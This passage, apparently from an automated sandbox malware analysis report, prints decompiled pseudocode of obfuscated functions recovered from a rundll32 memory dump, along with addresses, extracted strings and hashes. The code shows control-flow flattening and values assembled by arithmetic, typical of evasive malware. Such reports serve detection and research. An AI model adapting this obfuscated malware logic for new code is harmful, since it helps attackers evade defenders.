							if(_t419 > 0) {
								break;
							}
							if(_t419 == 0) {
								_t409 =  *0x21ca2c; // 0x495cc8
								_t410 = _t409 + 0x230;
								while(1) {
									__eflags =  *_t410 - _t399;
									if( *_t410 == _t399) {
										break;
									}
									_t410 = _t410 + 2;
									__eflags = _t410;
								}
								_t408 = _t410 + 2;
								_t380 = 0x3af90ff3;
								continue;
							}
							if(_t380 == 0x222340b) {
								E00205FB2(_v1208, _v1128, _t379);
								L27:
								return _v1052;
							}
							if(_t380 == 0x88778bb) {
								_t416 = E002054FE(_v1088, _v1160, _v1192, _v1064, _t380, _t380, _t408, _v1096, _v1200, _v1172, _v1132, _v1148, _v1044, _t380, _v1104, _t408,  &_v1040, _v1188, _t380, _t379, _v1140, _v1156, _t380, _v1180);
								_t417 =  &(_t417[0x16]);
								__eflags = _t416;
								if(_t416 == 0) {
									_t380 = 0x222340b;
								} else {
									_t380 = 0x212fea65;
									_v1052 = 1;
								}
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 == 0xeb1d0fe) {
								_push(_t380);
								_push(_t380);
								E0020C6C7(_v1196, _v1072,  &_v520, _t380, _v1112, _v1164, _v1168);
								_t417 =  &(_t417[7]);
								_t380 = 0x3304c1c2;
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 != 0x212fea65) {
								goto L24;
							}
							E002142DA(_t416, _v1204, _v1176, _v1056, _t379, _v1124);
							_t417 =  &(_t417[4]);
							_t380 = 0x2e0be9f8;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x2e0be9f8;
						if(_t380 == 0x2e0be9f8) {
							E00205FB2(_v1060, _v1068, _t416);
							_t380 = 0x222340b;
							_t399 = 0x5c;
							goto L24;
						}
						__eflags = _t380 - 0x3304c1c2;
						if(__eflags == 0) {
							_push(_v1116);
							_t365 = E0021889D(0x21c930, _v1108, __eflags);
							_t367 =  *0x21ca2c; // 0x495cc8
							_t402 =  *0x21ca2c; // 0x495cc8
							E002029E3(_t402, 0x104, _t365, _v1144, _v1212, _v1092, _t367 + 0x230,  &_v1040, _v1184, _v1100);
							E00212025(_v1076, _t365, _v1084, _v1136);
							_t417 =  &(_t417[0xc]);
							_t380 = 0x21daabfe;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x3af90ff3;
						if(_t380 != 0x3af90ff3) {
							goto L24;
						}
						_t379 = E00202959(_t380, _v1120, _v1080, _v1152, _v1048);
						_t417 =  &(_t417[4]);
						__eflags = _t379;
						if(_t379 == 0) {
							goto L27;
						}
						_t380 = 0x88778bb;
						goto L1;
						L24:
						__eflags = _t380 - 0x27fd7905;
					} while (_t380 != 0x27fd7905);
					goto L27;
				}
			}

0x0020d7eb
0x0020d7f1
0x0020d7fb
0x0020d800
0x0020d805
0x0020d80a
0x0020d812
0x0020d823
0x0020d827
0x0020d82b
0x0020d830
0x0020d838
0x0020d843
0x0020d84b
0x0020d856
0x0020d85e
0x0020d866
0x0020d86e
0x0020d876
0x0020d87e
0x0020d886
0x0020d88e
0x0020d896
0x0020d89e
0x0020d8a6
0x0020d8ae
0x0020d8b6
0x0020d8bb
0x0020d8c3
0x0020d8cb
0x0020d8d9
0x0020d8dc
0x0020d8e4
0x0020d8e8
0x0020d8f0
0x0020d8f8
0x0020d900
0x0020d905
0x0020d90a
0x0020d912
0x0020d91d
0x0020d928
0x0020d933
0x0020d93b
0x0020d943
0x0020d94b
0x0020d950
0x0020d958
0x0020d963
0x0020d96b
0x0020d976
0x0020d989
0x0020d990
0x0020d99b
0x0020d9a6
0x0020d9b1
0x0020d9bc
0x0020d9c4
0x0020d9cc
0x0020d9d4
0x0020d9dc
0x0020d9e4
0x0020d9e9
0x0020d9f1
0x0020d9fc
0x0020da07
0x0020da12
0x0020da1a
0x0020da22
0x0020da27
0x0020da2f
0x0020da3a
0x0020da42
0x0020da4f
0x0020da57
0x0020da5f
0x0020da64
0x0020da6c
0x0020da74
0x0020da7f
0x0020da86
0x0020da91
0x0020daa6
0x0020daa7
0x0020daae
0x0020dab9
0x0020dac1
0x0020dacb
0x0020dacf
0x0020dad7
0x0020dae4
0x0020daed
0x0020daf1
0x0020daf9
0x0020db04
0x0020db0f
0x0020db1a
0x0020db22
0x0020db2a
0x0020db32
0x0020db3a
0x0020db42
0x0020db4a
0x0020db52
0x0020db5a
0x0020db62
0x0020db6a
0x0020db72
0x0020db80
0x0020db84
0x0020db89
0x0020db8e
0x0020db96
0x0020db9e
0x0020dba6
0x0020dbae
0x0020dbb3
0x0020dbbb
0x0020dbc3
0x0020dbcb
0x0020dbd0
0x0020dbd8
0x0020dbe0
0x0020dbeb
0x0020dbf6
0x0020dc01
0x0020dc09
0x0020dc11
0x0020dc19
0x0020dc24
0x0020dc2f
0x0020dc3a
0x0020dc45
0x0020dc4d
0x0020dc58
0x0020dc65
0x0020dc69
0x0020dc6e
0x0020dc76
0x0020dc7e
0x0020dc86
0x0020dc8b
0x0020dc93
0x0020dc9b
0x0020dcb2
0x0020dcb5
0x0020dcbc
0x0020dcc3
0x0020dcce
0x0020dcde
0x0020dce5
0x0020dce9
0x0020dcf1
0x0020dcf9
0x0020dd01
0x0020dd0d
0x0020dd10
0x0020dd17
0x0020dd1b
0x0020dd20
0x0020dd28
0x0020dd30
0x0020dd38
0x0020dd40
0x0020dd45
0x0020dd4d
0x0020dd55
0x0020dd5d
0x0020dd65
0x0020dd6d
0x0020dd75
0x0020dd75
0x0020dd77
0x0020dd78
0x0020dd78
0x0020dd78
0x0020dd78
0x0020dd7e
0x00000000
0x00000000
0x0020dd84
0x0020de9f
0x0020dea5
0x0020deb0
0x0020deb0
0x0020deb3
0x00000000
0x00000000
0x0020dead
0x0020dead
0x0020dead
0x0020deb5
0x0020deb8
0x00000000
0x0020deb8
0x0020dd90
0x0020dfca
0x0020dfd0
0x0020dfe1
0x0020dfe1
0x0020dd9c
0x0020de77
0x0020de79
0x0020de7c
0x0020de7e
0x0020de95
0x0020de80
0x0020de80
0x0020de85
0x0020de85
0x0020dd75
0x0020dd75
0x0020dd77
0x00000000
0x0020dd77
0x0020dd75
0x0020dda4
0x0020ddd7
0x0020ddd8
0x0020ddfc
0x0020de01
0x0020de04
0x0020dd75
0x0020dd75
0x0020dd77
0x00000000
0x0020dd77
0x0020dd75
0x0020ddac
0x00000000
0x00000000
0x0020ddc8
0x0020ddcd
0x0020ddd0
0x0020dd75
0x0020dd75
0x0020dd77
0x00000000
0x0020dd77
0x0020dd75
0x0020dec2
0x0020dec8
0x0020dfa5
0x0020dfad
0x0020dfb2
0x00000000
0x0020dfb2
0x0020dece
0x0020ded4
0x0020df14
0x0020df21
0x0020df42
0x0020df5c
0x0020df68
0x0020df84
0x0020df89
0x0020df8c
0x0020dd75
0x0020dd75
0x0020dd77
0x00000000
0x0020dd77
0x0020dd75
0x0020ded6
0x0020dedc
0x00000000
0x00000000
0x0020defd
0x0020deff
0x0020df02
0x0020df04
0x00000000
0x00000000
0x0020df0a
0x00000000
0x0020dfb3
0x0020dfb3
0x0020dfb3
0x00000000
0x0020dfbf

Strings

rj4, xrefs: 0020DCF1
Kx, xrefs: 0020DC24
H, xrefs: 0020D7F1
yql, xrefs: 0020D830
m, xrefs: 0020DC4D
Gm, xrefs: 0020D8BB
@g, xrefs: 0020D84B
#0, xrefs: 0020D9A6
'], xrefs: 0020DC7E
e/!, xrefs: 0020DDA6
e/!, xrefs: 0020DE80
), xrefs: 0020D80A
,, xrefs: 0020DAF9
x&, xrefs: 0020DA4F
6O, xrefs: 0020DA42
"%j(, xrefs: 0020DC11

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: "%j($#0$']$)$6O$@g$H$Kx$e/!$e/!$x&$yql$,$Gm$m$rj4
API String ID: 1725840886-2205337676
Opcode ID: 691bbe165fcc6b92212c8ac7d6e733efee78436587dc4fa71b015356f16a1bc9
Instruction ID: 5d43ef42891b5efd9221acc66e2ad0fdefccde056705607374dcddae0af01a77
Opcode Fuzzy Hash: 691bbe165fcc6b92212c8ac7d6e733efee78436587dc4fa71b015356f16a1bc9
Instruction Fuzzy Hash: BF023271119381DFE369CF61C58AA5BBBF1FBC4308F10891DE29A862A1C7B58958CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00201CFA, Relevance: 19.3, Strings: 15, Instructions: 503
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00201CFA(void* __edx, intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				unsigned int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				void* __ecx;
				void* _t496;
				void* _t539;
				intOrPtr _t544;
				intOrPtr _t546;
				signed int _t548;
				signed int _t551;
				intOrPtr _t552;
				intOrPtr _t554;
				signed int _t555;
				intOrPtr _t562;
				intOrPtr _t572;
				void* _t574;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				signed int _t584;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				intOrPtr _t591;
				intOrPtr _t592;
				void* _t597;
				intOrPtr _t599;
				intOrPtr _t635;
				intOrPtr _t639;
				void* _t641;
				signed int* _t653;
				void* _t656;

				_t575 = _a4;
				_push(_a4);
				_push(__edx);
				E0020602B(_t496);
				_v12 = 0x36bdff;
				_t653 =  &(( &_v228)[3]);
				_v8 = 0x3ff2a1;
				_t639 = 0;
				_v4 = 0;
				_v132 = 0xebdb;
				_t641 = 0x15e50797;
				_t577 = 0x54;
				_v132 = _v132 / _t577;
				_v132 = _v132 | 0x22f60655;
				_v132 = _v132 ^ 0x22f660d1;
				_v120 = 0xef02;
				_v120 = _v120 + 0xffff4354;
				_v120 = _v120 + 0xfbd6;
				_v120 = _v120 ^ 0x0001ae28;
				_v52 = 0x7417;
				_v52 = _v52 + 0x1179;
				_v52 = _v52 ^ 0x00000590;
				_v48 = 0x8f30;
				_v48 = _v48 >> 0xf;
				_v64 = 0xc7cd;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x0c7cd040;
				_v140 = 0xc967;
				_v140 = _v140 << 0xb;
				_v140 = _v140 | 0xe06bf9c9;
				_v140 = _v140 ^ 0x166bf9c9;
				_v196 = 0x461e;
				_v196 = _v196 | 0x6b692bd6;
				_v196 = _v196 + 0xc0cf;
				_v196 = _v196 + 0xffff0de4;
				_v196 = _v196 ^ 0x6b6977c5;
				_v180 = 0xfff7;
				_t578 = 0x59;
				_v180 = _v180 / _t578;
				_t579 = 0x4d;
				_v180 = _v180 * 0x18;
				_v180 = _v180 | 0x58a6a9da;
				_v180 = _v180 ^ 0x58a6c249;
				_v128 = 0x9f16;
				_v128 = _v128 ^ 0xdade8ffa;
				_v128 = _v128 ^ 0x4c90ffe3;
				_v128 = _v128 ^ 0x964ece00;
				_v92 = 0xcecd;
				_v92 = _v92 + 0x8237;
				_v92 = _v92 / _t579;
				_v92 = _v92 ^ 0x00006f99;
				_v100 = 0x1088;
				_v100 = _v100 << 8;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0084674e;
				_v108 = 0x5533;
				_v108 = _v108 >> 9;
				_v108 = _v108 | 0xd8fb4233;
				_v108 = _v108 ^ 0xd8fb1bcd;
				_v208 = 0xcae;
				_v208 = _v208 / _t579;
				_t580 = 0x13;
				_v208 = _v208 / _t580;
				_v208 = _v208 >> 0xa;
				_v208 = _v208 ^ 0x00001a16;
				_v216 = 0x40e3;
				_v216 = _v216 | 0x810267c5;
				_v216 = _v216 << 1;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x10267eee;
				_v28 = 0xb673;
				_t581 = 0x3e;
				_v28 = _v28 / _t581;
				_v28 = _v28 ^ 0x0000683f;
				_v40 = 0x9279;
				_v40 = _v40 + 0xffffeab6;
				_v40 = _v40 ^ 0x000054a5;
				_v204 = 0x1c40;
				_v204 = _v204 + 0xffff1f7d;
				_t582 = 0x50;
				_v204 = _v204 / _t582;
				_v204 = _v204 ^ 0x72bb6b9a;
				_v204 = _v204 ^ 0x71887e03;
				_v112 = 0xb897;
				_v112 = _v112 + 0xffffdcba;
				_v112 = _v112 | 0x14aad9bd;
				_v112 = _v112 ^ 0x14aaad8a;
				_v172 = 0xd85f;
				_v172 = _v172 + 0xffff9181;
				_t583 = 0x36;
				_v172 = _v172 * 0x2e;
				_v172 = _v172 + 0x3c74;
				_v172 = _v172 ^ 0x00135ecd;
				_v212 = 0x19f7;
				_v212 = _v212 + 0xffff95e1;
				_v212 = _v212 | 0x04fc32b0;
				_v212 = _v212 << 0xa;
				_v212 = _v212 ^ 0xfeffe01a;
				_v36 = 0x7d37;
				_v36 = _v36 | 0x20ef5b1a;
				_v36 = _v36 ^ 0x20ef0402;
				_v116 = 0xd595;
				_v116 = _v116 / _t583;
				_v116 = _v116 + 0xffffe49c;
				_v116 = _v116 ^ 0xffffa94a;
				_v160 = 0x5e14;
				_v160 = _v160 | 0xdf0c29a2;
				_v160 = _v160 ^ 0xe579e09e;
				_v160 = _v160 + 0xffffde5a;
				_v160 = _v160 ^ 0x3a753154;
				_v68 = 0x52ff;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x000014f4;
				_v76 = 0x7879;
				_t584 = 0x73;
				_v76 = _v76 / _t584;
				_v76 = _v76 ^ 0x0000054d;
				_v72 = 0x594e;
				_v72 = _v72 ^ 0x61e5003d;
				_v72 = _v72 ^ 0x61e57443;
				_v156 = 0xdc41;
				_v156 = _v156 << 6;
				_v156 = _v156 << 0x10;
				_v156 = _v156 ^ 0x10402e5f;
				_v152 = 0x2cab;
				_v152 = _v152 << 0xc;
				_v152 = _v152 ^ 0xa6d63634;
				_v152 = _v152 ^ 0xa41cdbd3;
				_v24 = 0xfca2;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 ^ 0x000010c7;
				_v96 = 0xe6c1;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0xc19f;
				_v96 = _v96 ^ 0x1cd8953a;
				_v224 = 0x49a1;
				_v224 = _v224 ^ 0xfe0521c0;
				_v224 = _v224 + 0x1e0d;
				_v224 = _v224 | 0x46707e16;
				_v224 = _v224 ^ 0xfe759897;
				_v228 = 0x2882;
				_v228 = _v228 << 0x10;
				_v228 = _v228 ^ 0x2e28bbbf;
				_v228 = _v228 | 0x3bec92e5;
				_v228 = _v228 ^ 0x3fee891d;
				_v136 = 0x5ad;
				_v136 = _v136 ^ 0x3d33a635;
				_v136 = _v136 + 0xffff9ac4;
				_v136 = _v136 ^ 0x3d335448;
				_v104 = 0x3c69;
				_v104 = _v104 + 0xf144;
				_t585 = 0x19;
				_v104 = _v104 * 0x1e;
				_v104 = _v104 ^ 0x0023546a;
				_v188 = 0xf300;
				_v188 = _v188 / _t585;
				_v188 = _v188 + 0xffffad26;
				_v188 = _v188 | 0x8105dcb8;
				_v188 = _v188 ^ 0xffffe238;
				_v144 = 0x45c8;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 + 0x45b6;
				_v144 = _v144 ^ 0x000072cd;
				_v192 = 0xd236;
				_v192 = _v192 >> 0x10;
				_t586 = 0x69;
				_v192 = _v192 / _t586;
				_v192 = _v192 ^ 0x176600d6;
				_v192 = _v192 ^ 0x17663ad7;
				_v200 = 0x1b90;
				_v200 = _v200 >> 0xe;
				_v200 = _v200 | 0x00032953;
				_t587 = 0xe;
				_v200 = _v200 * 0x71;
				_v200 = _v200 ^ 0x016540c6;
				_v32 = 0xa5b;
				_v32 = _v32 / _t587;
				_v32 = _v32 ^ 0x00002bda;
				_v56 = 0xbe4e;
				_v56 = _v56 + 0xffffe059;
				_v56 = _v56 ^ 0x0000eaa3;
				_v220 = 0x4321;
				_v220 = _v220 ^ 0x3fa1daa1;
				_v220 = _v220 + 0xffff309f;
				_t588 = 0x24;
				_v220 = _v220 / _t588;
				_v220 = _v220 ^ 0x01c46047;
				_v164 = 0x3944;
				_v164 = _v164 + 0xffff1fd9;
				_t589 = 0x2b;
				_v164 = _v164 * 0x57;
				_v164 = _v164 << 4;
				_v164 = _v164 ^ 0xfc749d64;
				_v148 = 0x7755;
				_v148 = _v148 ^ 0x244775ea;
				_v148 = _v148 | 0xcd3e82a6;
				_v148 = _v148 ^ 0xed7f8152;
				_v88 = 0x40ad;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x000030bd;
				_v80 = 0x9327;
				_v80 = _v80 * 0x70;
				_v80 = _v80 ^ 0x00406c8d;
				_v176 = 0x8ba8;
				_v176 = _v176 + 0x5748;
				_v176 = _v176 + 0xffffe08a;
				_v176 = _v176 + 0xffffcf91;
				_v176 = _v176 ^ 0x0000bf1e;
				_v124 = 0xe985;
				_v124 = _v124 ^ 0x9cf6d459;
				_v124 = _v124 + 0xffffb832;
				_v124 = _v124 ^ 0x9cf5d440;
				_v184 = 0xee13;
				_v184 = _v184 / _t589;
				_v184 = _v184 ^ 0x973ecc13;
				_t590 = 0x6a;
				_v184 = _v184 / _t590;
				_v184 = _v184 ^ 0x016d24ef;
				_v84 = 0xbcf1;
				_v84 = _v84 ^ 0x64b03ea8;
				_v84 = _v84 ^ 0x64b0e2a8;
				_v60 = 0x8a4f;
				_v60 = _v60 | 0x8c15d5a4;
				_v60 = _v60 ^ 0x8c14dfef;
				_v44 = 0x30ef;
				_v44 = _v44 + 0xffffe2a4;
				_v44 = _v44 ^ 0x00001380;
				_v168 = 0xbe5e;
				_v168 = _v168 << 0x10;
				_v168 = _v168 | 0x5aa68a8d;
				_v168 = _v168 + 0xffff34cf;
				_v168 = _v168 ^ 0xfefdbf5d;
				goto L1;
				do {
					while(1) {
						L1:
						_t656 = _t641 - 0x2e2ba50c;
						if(_t656 > 0) {
							break;
						}
						if(_t656 == 0) {
							_push(_t590);
							_push(_t590);
							_t591 =  *0x21ca20; // 0x0
							_t590 = _t591 + 0x18;
							_t551 = E0020C46E(_t590, _v208, _v216, _v28, _v140 | _v64, _t590, _v40);
							_t653 =  &(_t653[7]);
							asm("sbb esi, esi");
							_t641 = ( ~_t551 & 0xf61d5154) + 0x3b32afa9;
							continue;
						} else {
							if(_t641 == 0xfdb1f24) {
								_t552 =  *0x21ca20; // 0x0
								_t554 =  *0x21ca20; // 0x0
								_t555 = E0020F292(_v72, _v156,  *((intOrPtr*)(_t554 + 0x18)), _v152, _v20, _v24, _t590, _v16, _t552 + 0x24, _t590, _v96);
								_t590 = _v224;
								asm("sbb esi, esi");
								_t641 = ( ~_t555 & 0x1a4c73ed) + 0x1af0d9d8;
								E00219465(_t590, _v20, _v228);
								_t653 =  &(_t653[0xa]);
								goto L27;
							} else {
								if(_t641 == 0x15e50797) {
									_push(_t590);
									_t597 = 0x34;
									_t562 = E00208736(_t597);
									 *0x21ca20 = _t562;
									_t590 = _t590;
									if(_t562 != 0) {
										_t641 = 0x2e2ba50c;
										continue;
									}
								} else {
									if(_t641 == 0x1af0d9d8) {
										_t599 =  *0x21ca20; // 0x0
										_t590 =  *(_t599 + 0x18);
										E002087FA(_t590);
										_t653 = _t653 - 0x10 + 0x10;
										_t641 = 0x3b32afa9;
										continue;
									} else {
										if(_t641 == 0x1f84fef1) {
											_t572 =  *0x21ca20; // 0x0
											_push(_t590);
											_push(_t590);
											E0021AB25(_t590,  *((intOrPtr*)(_t572 + 0x24)));
											_t653 =  &(_t653[3]);
											_t641 = 0x1af0d9d8;
											continue;
										} else {
											if(_t641 != 0x2135b5bc) {
												goto L27;
											} else {
												_t635 =  *0x21ca20; // 0x0
												_t437 = _t635 + 0x2c; // 0x2c
												_t590 = _t437;
												_t574 = E00211A1F(_t590,  *((intOrPtr*)(_t635 + 0x18)), _v220, _v120, _v164, _v148, _t590, _v88, _t590, _v80);
												_t653 =  &(_t653[8]);
												if(_t574 != 0) {
													_t639 = 1;
												} else {
													_t641 = 0x3151f296;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L21:
						return _t639;
					}
					if(_t641 == 0x315000fd) {
						_t590 = _v36;
						_t539 = E002075AE(_t590,  *_t575, _t590,  &_v20, _v44, _v116,  *((intOrPtr*)(_t575 + 4)),  &_v16, _v160, _v52, _v168 | _v60, _v68, _v76);
						_t653 =  &(_t653[0xb]);
						if(_t539 == 0) {
							_t641 = 0x1af0d9d8;
							goto L27;
						} else {
							_t641 = 0xfdb1f24;
							goto L1;
						}
					} else {
						if(_t641 == 0x3151f296) {
							_t544 =  *0x21ca20; // 0x0
							_push(_t590);
							_push(_t590);
							E0021AB25(_t590,  *((intOrPtr*)(_t544 + 0x10)));
							_t653 =  &(_t653[3]);
							_t641 = 0x1f84fef1;
							goto L1;
						} else {
							if(_t641 == 0x353d4dc5) {
								_t546 =  *0x21ca20; // 0x0
								_t592 =  *0x21ca20; // 0x0
								_t590 =  *(_t592 + 0x18);
								_t548 = E002066C9(_t590, _v48, _v132, _t546 + 0x10, _v192, _v200, _v32, _v56);
								_t653 =  &(_t653[6]);
								asm("sbb esi, esi");
								_t641 = ( ~_t548 & 0x01b0b6cb) + 0x1f84fef1;
								goto L1;
							} else {
								if(_t641 != 0x3b32afa9) {
									goto L27;
								} else {
									E0020F536(_v92, _v100, _v108,  *0x21ca20);
								}
							}
						}
					}
					goto L21;
					L27:
				} while (_t641 != 0x5edb69a);
				goto L21;
			}

0x00201d01
0x00201d0b
0x00201d0c
0x00201d0e
0x00201d13
0x00201d1e
0x00201d21
0x00201d2c
0x00201d2e
0x00201d37
0x00201d3f
0x00201d4a
0x00201d4f
0x00201d55
0x00201d5d
0x00201d65
0x00201d70
0x00201d7b
0x00201d86
0x00201d91
0x00201d9c
0x00201da7
0x00201db2
0x00201dbd
0x00201dd3
0x00201dde
0x00201de6
0x00201df1
0x00201df9
0x00201dfe
0x00201e06
0x00201e0e
0x00201e16
0x00201e1e
0x00201e26
0x00201e2e
0x00201e36
0x00201e42
0x00201e47
0x00201e52
0x00201e53
0x00201e57
0x00201e5f
0x00201e67
0x00201e6f
0x00201e77
0x00201e7f
0x00201e87
0x00201e92
0x00201ea6
0x00201ead
0x00201eb8
0x00201ec3
0x00201ecb
0x00201ed3
0x00201ede
0x00201ee9
0x00201ef1
0x00201efc
0x00201f07
0x00201f19
0x00201f23
0x00201f28
0x00201f2e
0x00201f33
0x00201f3b
0x00201f43
0x00201f4b
0x00201f4f
0x00201f54
0x00201f5c
0x00201f6e
0x00201f73
0x00201f7c
0x00201f87
0x00201f92
0x00201f9d
0x00201fa8
0x00201fb0
0x00201fbc
0x00201fc1
0x00201fc7
0x00201fcf
0x00201fd7
0x00201fe2
0x00201fed
0x00201ff8
0x00202003
0x0020200b
0x00202018
0x0020201b
0x0020201f
0x00202027
0x0020202f
0x00202037
0x0020203f
0x00202047
0x0020204c
0x00202054
0x0020205f
0x0020206a
0x00202075
0x0020208b
0x00202092
0x0020209d
0x002020a8
0x002020b0
0x002020b8
0x002020c0
0x002020c8
0x002020d0
0x002020db
0x002020e3
0x002020ee
0x00202100
0x00202103
0x0020210a
0x00202115
0x00202120
0x0020212d
0x00202138
0x00202140
0x00202145
0x0020214a
0x00202152
0x0020215a
0x0020215f
0x00202167
0x0020216f
0x0020217a
0x00202182
0x0020218d
0x00202198
0x002021a0
0x002021ab
0x002021b6
0x002021be
0x002021c6
0x002021ce
0x002021d6
0x002021de
0x002021e6
0x002021eb
0x002021f3
0x002021fb
0x00202203
0x0020220b
0x00202213
0x0020221b
0x00202223
0x0020222e
0x00202243
0x00202246
0x0020224d
0x00202258
0x00202268
0x0020226c
0x00202274
0x0020227c
0x00202284
0x0020228c
0x00202291
0x00202299
0x002022a1
0x002022a9
0x002022b2
0x002022b7
0x002022bd
0x002022c5
0x002022cd
0x002022d5
0x002022da
0x002022e7
0x002022e8
0x002022ec
0x002022f4
0x00202308
0x0020230f
0x0020231a
0x00202325
0x00202330
0x0020233b
0x00202343
0x0020234b
0x00202360
0x00202365
0x0020236b
0x00202373
0x0020237b
0x00202388
0x0020238b
0x0020238f
0x00202394
0x0020239c
0x002023a4
0x002023ac
0x002023b4
0x002023bc
0x002023c7
0x002023cf
0x002023da
0x002023ed
0x002023f4
0x002023ff
0x00202407
0x0020240f
0x00202417
0x0020241f
0x00202427
0x0020242f
0x00202437
0x0020243f
0x00202447
0x00202457
0x0020245b
0x00202467
0x0020246a
0x0020246e
0x00202476
0x00202481
0x0020248c
0x00202497
0x002024a2
0x002024ad
0x002024b8
0x002024c3
0x002024ce
0x002024d9
0x002024e1
0x002024e6
0x002024ee
0x002024f6
0x002024f6
0x002024fe
0x002024fe
0x002024fe
0x002024fe
0x00202504
0x00000000
0x00000000
0x0020250a
0x00202686
0x00202687
0x002026a7
0x002026b1
0x002026b4
0x002026b9
0x002026c0
0x002026c8
0x00000000
0x00202510
0x00202516
0x00202620
0x00202644
0x00202657
0x00202669
0x0020266f
0x00202677
0x00202679
0x0020267e
0x00000000
0x0020251c
0x00202522
0x002025f6
0x002025fa
0x002025fb
0x00202600
0x00202606
0x00202609
0x0020260f
0x00000000
0x0020260f
0x00202528
0x0020252a
0x002025cf
0x002025d5
0x002025d8
0x002025dd
0x002025e0
0x00000000
0x00202530
0x00202536
0x002025a0
0x002025a5
0x002025a6
0x002025aa
0x002025af
0x002025b2
0x00000000
0x00202538
0x0020253e
0x00000000
0x00202544
0x00202567
0x0020256d
0x0020256d
0x00202573
0x00202578
0x0020257d
0x0020282d
0x00202583
0x00202583
0x00000000
0x00202583
0x0020257d
0x0020253e
0x00202536
0x0020252a
0x00202522
0x00202516
0x00202721
0x0020272d
0x0020272d
0x002026d9
0x002027fb
0x00202802
0x00202807
0x0020280c
0x00202818
0x00000000
0x0020280e
0x0020280e
0x00000000
0x0020280e
0x002026df
0x002026e5
0x00202796
0x0020279b
0x0020279c
0x002027a0
0x002027a5
0x002027a8
0x00000000
0x002026eb
0x002026f1
0x00202744
0x0020275b
0x00202761
0x00202764
0x00202769
0x00202770
0x00202778
0x00000000
0x002026f3
0x002026f9
0x00000000
0x002026ff
0x0020271a
0x00202720
0x002026f9
0x002026f1
0x002026e5
0x00000000
0x0020281a
0x0020281a
0x00000000

Strings

jT#, xrefs: 0020224D
T1u:, xrefs: 002020C8
0, xrefs: 002024B8
[, xrefs: 002022F4
HT3=, xrefs: 0020221B
?h, xrefs: 00201F7C
3U, xrefs: 00201EDE
i<, xrefs: 00202223
uG$, xrefs: 002023A4
Cta, xrefs: 0020212D
D9, xrefs: 00202373
@, xrefs: 00201F3B
HW, xrefs: 00202407
t<, xrefs: 0020201F
!C, xrefs: 0020233B

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !C$3U$?h$Cta$D9$HT3=$HW$T1u:$[$i<$jT#$t<$0$@$uG$
API String ID: 0-3043381779
Opcode ID: 5042c80785fd5832a6218e34218fa38eff66e1890cd4ba0074bb563516763696
Instruction ID: 3eb1007bd7aaae14fa8ca77bfe89109167831fea0d001d881be4a6bdff5b042b
Opcode Fuzzy Hash: 5042c80785fd5832a6218e34218fa38eff66e1890cd4ba0074bb563516763696
Instruction Fuzzy Hash: 7B425571508381DFE3B8CF25C98AA9BBBE1BBC4304F10891DE5D9962A1D7B58859CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0021511B, Relevance: 17.9, Strings: 14, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0021511B(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr* _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
